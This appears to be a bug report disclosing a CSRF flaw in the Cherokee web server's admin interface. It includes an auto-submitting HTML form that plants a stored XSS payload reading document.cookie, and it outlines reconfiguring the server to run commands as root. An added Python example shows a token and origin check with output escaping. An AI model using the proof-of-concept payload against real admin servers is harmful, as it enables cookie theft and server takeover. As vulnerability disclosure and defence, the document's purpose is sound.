Comment 0 for bug 784632

David (d--) wrote :

Binary package hint: cherokee

The cherokee admin server is vulnerable to CSRF.

Using CSRF it is possible to produce a persistent XSS in several pages, including at least the 'status' page.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
 <input type="text" name="tmp!new_droot" value='/var/www/'></input>
 <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>
</html>

A worst-case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090, then if they visit a $bad page which sends POST requests to the cherokee admin server, the bad page may be able to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error (or access) will run a command ...
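
A server-side check that would reject the cross-site POST described in this report and escape the stored nick on output, as an added example (not Cherokee's code and not part of the original report). The `csrf_token` field name, the session key handling, the function names and the sample requests are assumptions made for illustration.

```python
import hashlib, hmac, html, secrets
from urllib.parse import urlsplit

ADMIN_ORIGIN = "http://127.0.0.1:9090"   # admin address used in the report
TOKEN_FIELD = "csrf_token"               # assumed hidden form field name

def issue_token(session_key: bytes, session_id: str) -> str:
    """Per-session token the admin UI embeds in every form it renders."""
    return hmac.new(session_key, session_id.encode(), hashlib.sha256).hexdigest()

def origin_ok(headers: dict) -> bool:
    """Accept only requests sent from the admin UI's own origin."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == ADMIN_ORIGIN

def allow_post(headers: dict, form: dict, session_key: bytes, session_id: str) -> bool:
    """A state-changing POST needs a same-origin source AND the session token."""
    expected = issue_token(session_key, session_id).encode()
    supplied = form.get(TOKEN_FIELD, "").encode()
    return origin_ok(headers) and hmac.compare_digest(expected, supplied)

def render_nick(nick: str) -> str:
    """Escape stored values on output so a saved nick cannot leave the attribute."""
    return '<input type="text" name="nick" value="%s">' % html.escape(nick, quote=True)

# Constructed sample data: the nick value is the one from the report's form.
KEY, SID = secrets.token_bytes(32), "constructed-session-id"
REPORTED_NICK = '" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'
FORGED = ({"Origin": "http://bad.example"},
          {"tmp!new_droot": "/var/www/", "tmp!new_nick": REPORTED_NICK})
GENUINE = ({"Origin": ADMIN_ORIGIN},
           {"tmp!new_droot": "/var/www/", "tmp!new_nick": "example",
            TOKEN_FIELD: issue_token(KEY, SID)})

if __name__ == "__main__":
    print("forged POST allowed: ", allow_post(*FORGED, KEY, SID))
    print("genuine POST allowed:", allow_post(*GENUINE, KEY, SID))
    print(render_nick(REPORTED_NICK))
```

The token check stops the cross-site request from being accepted; the output escaping is a separate layer that keeps an already stored value from being interpreted as markup.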